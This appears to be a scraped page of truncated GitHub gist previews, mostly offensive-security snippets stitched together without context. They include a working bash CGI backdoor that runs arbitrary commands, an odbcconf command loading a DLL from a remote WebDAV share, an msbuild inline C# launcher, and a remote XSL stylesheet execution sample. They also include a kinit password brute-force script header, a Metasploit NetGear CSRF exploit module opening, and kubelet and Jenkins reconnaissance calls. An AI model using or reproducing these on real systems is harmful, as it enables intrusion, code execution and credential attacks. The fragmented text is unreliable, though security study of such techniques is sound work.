jenkins_url
+ /api/json?tree=jobs[name,color]
jenkins_url
+ /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]
curl -sk https://localhost:10250/pods/
--anonymous-auth
is turned off, you will see a 401 Unauthorized
response.--anonymous-auth
is true
and --authorization-mode
is Webhook
you'll see 403 Forbidden
response with message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
--anonymous-auth
is true
and --authorization-mode
is AlwaysAllow
you'll see a list of pods.<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
<customers> | |
<customer> | |
<name>Microsoft</name> | |
</customer> | |
</customers> |
### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!] | |
1. Get a YubiHSM2 @ https://www.yubico.com/products/hardware-security-module/ | |
2. Follow this: https://github.com/YubicoLabs/yubihsm-ssh-tool [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine. | |
3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine. | |
3. Update /etc/ssh/sshd_config on remote server to add: | |
TrustedUserCAKeys /etc/ssh/ca.pub | |
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u | |
4. Add principals here: | |
ex: |
#!/bin/bash | |
# Title: kinit_brute.sh | |
# Author: @ropnop | |
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
# The script configures the realm and KDC for you based on the domain provided and the domain controller | |
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
# Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful |
/* | |
To use with odbcconf.exe: | |
odbcconf /S /A {REGSVR odbcconf.dll} | |
or, from a remote location (if WebDAV support enabled): | |
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll} | |
*/ | |
using System; |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpServer::HTML | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'NetGear UPnP CSRF', |
cd /tmp | |
mkdir cgi-bin | |
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
chmod +x ./cgi-bin/backdoor.cgi | |
python -m http.server --cgi | |
By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
<Target Name="Hello"> | |
<SharpLauncher > | |
</SharpLauncher> | |
</Target> | |
<UsingTask | |
TaskName="SharpLauncher" | |
TaskFactory="CodeTaskFactory" |